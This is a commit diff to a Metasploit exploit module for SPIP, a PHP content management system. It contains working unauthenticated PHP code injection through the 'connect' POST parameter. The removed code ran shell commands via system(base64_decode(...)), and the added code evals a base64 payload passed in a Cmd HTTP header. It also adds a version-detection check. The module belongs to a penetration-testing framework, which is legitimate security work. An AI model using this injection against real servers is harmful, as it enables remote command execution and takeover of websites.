Apply review to spip_connect_exec

jvazquez-r7 · jvazquez-r7 · commit 3a8856ae7ffb · 2013-07-15T09:44:05.000-05:00
diff --git a/modules/exploits/unix/webapp/spip_connect_exec.rb b/modules/exploits/unix/webapp/spip_connect_exec.rb
@@ -6,45 +6,38 @@
 ##
 
 require 'msf/core'
-require 'base64'
 
 class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'SPIP Connect Parameter Injection',
+			'Name'           => 'SPIP connect Parameter PHP Injection',
 			'Description'    => %q{
-				This module exploits a PHP code injection in SPIP. The vulnerability
-				exists in the connect parameter and allows an unauthenticated user
-				to execute arbitrary commands with web user privileges. Branchs 2.0/2.1/3 are concerned.
-				Vulnerable versions are < 2.0.21 & < 2.1.16 & < 3.0.3.
-				The module has been tested successfully with SPIP 2.0.11/Apache on Ubuntu and Fedora.
+				This module exploits a PHP code injection in SPIP. The vulnerability exists in the
+				connect parameter and allows an unauthenticated user to execute arbitrary commands
+				with web user privileges. Branchs 2.0, 2.1 and 3 are concerned. Vulnerable versions
+				are <2.0.21, <2.1.16 and < 3.0.3, but this module works only against branch 2.0 and
+				has been tested successfully with SPIP 2.0.11 and SPIP 2.0.20 with Apache on Ubuntu
+				and Fedora linux distributions.
 			},
-			'Author'          =>
+			'Author'         =>
 				[
 					'Arnaud Pachot',					#Initial discovery
 					'Davy Douhine and Frederic Cikala',	#PoC
 					'Davy Douhine',						#MSF module
 				],
-			'License'         => MSF_LICENSE,
-			'References'      =>
+			'License'        => MSF_LICENSE,
+			'References'     =>
 				[
+					[ 'OSVDB', '83543' ],
 					[ 'BID', '54292' ],
 					[ 'URL', 'http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la' ]
 				],
-			'Platform'       => ['unix'],
-			'Arch'           => ARCH_CMD,
-			'Payload'        =>
-				{
-					'Space'       => 1024,
-					'DisableNops' => true,
-					'Compat'      =>
-						{
-							'PayloadType' => 'cmd',
-						}
-				},
+			'Privileged'     => false,
+			'Platform'       => ['php'],
+			'Arch'           => ARCH_PHP,
 			'Targets'        =>
 				[
 					[ 'Automatic', { } ]
@@ -58,42 +51,52 @@ def initialize(info = {})
 			], self.class)
 	end
 
-	def exploit
-		uri = normalize_uri(target_uri.path, 'spip.php')
-		print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
-
-		# Very dirty trick !
-		# The SPIP server answers an HTML page which contains the ouput of the executed command on target.
-		# To easily extract the command output a header and a trailer are used.
-		# Then the whole thing (header + CMD + trailer) is base64 encoded to avoid spaces/special char filtering
-		# The header and the trailer will then be used to display the result (print_status)
-		# Rex::Text.encode_base64() instead?
-		cmd64   = Rex::Text.encode_base64("echo \"-123-\";#{datastore['CMD']}\;echo \"-456-\";")
-
-		# Another dirty trick !
-		# A character is added in the trailer to make the cmd64 string longer and avoid SPIP "=" filtering.
-		if cmd64.include?("=")
-			cmd64   = Rex::Text.encode_base64("echo \"-123-\";#{datastore['CMD']}\;echo \"-456--\";")
+	def check
+		version = nil
+		uri = normalize_uri(target_uri.path, "spip.php")
+
+		res = send_request_cgi({ 'uri' => "#{uri}" })
+
+		if res and res.code == 200 and res.body =~ /<meta name="generator" content="SPIP (.*) \[/
+			version = $1
+		end
+
+		if version.nil? and res.code == 200 and res.headers["Composed-By"] =~ /SPIP (.*) @/
+			version = $1
+		end
+
+		if version.nil?
+			return Exploit::CheckCode::Unknown
 		end
 
-		# The (trivial) vuln
-		data_cmd = "connect=?><? system(base64_decode(#{cmd64}))?>"
-
-		begin
-			print_status("Attempting to connect to #{rhost}:#{rport}")
-			res = send_request_cgi(
-				{
-					'uri'    => uri,
-					'method' => 'POST',
-					'data'   => data_cmd
-				})
-			if (res)
-		# Extracting the output of the executed command (using the dirty trick)
-			result = res.body.to_s.split("-123-").last.to_s.split("-456-").first
-				print_status("Output: #{result}")
-			end
+		vprint_status("SPIP Version detected: #{version}")
+
+		if version =~ /^2\.0/ and version < "2.0.21"
+			return Exploit::CheckCode::Vulnerable
+		elsif version =~ /^2\.1/ and version < "2.1.16"
+			return Exploit::CheckCode::Appears
+		elsif version =~ /^3\.0/ and version < "3.0.3"
+			return Exploit::CheckCode::Appears
 		end
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-		rescue ::Timeout::Error, ::Errno::EPIPE
+
+		return Exploit::CheckCode::Safe
+
 	end
+
+	def exploit
+		uri = normalize_uri(target_uri.path, 'spip.php')
+		print_status("#{rhost}:#{rport} - Attempting to exploit...")
+		res = send_request_cgi(
+			{
+				'uri'    => uri,
+				'method' => 'POST',
+				'vars_post' => {
+					'connect' => "?><? eval(base64_decode($_SERVER[HTTP_CMD])); ?>",
+				},
+				'headers' => {
+					'Cmd' => Rex::Text.encode_base64(payload.encoded)
+				}
+			})
+	end
+
 end
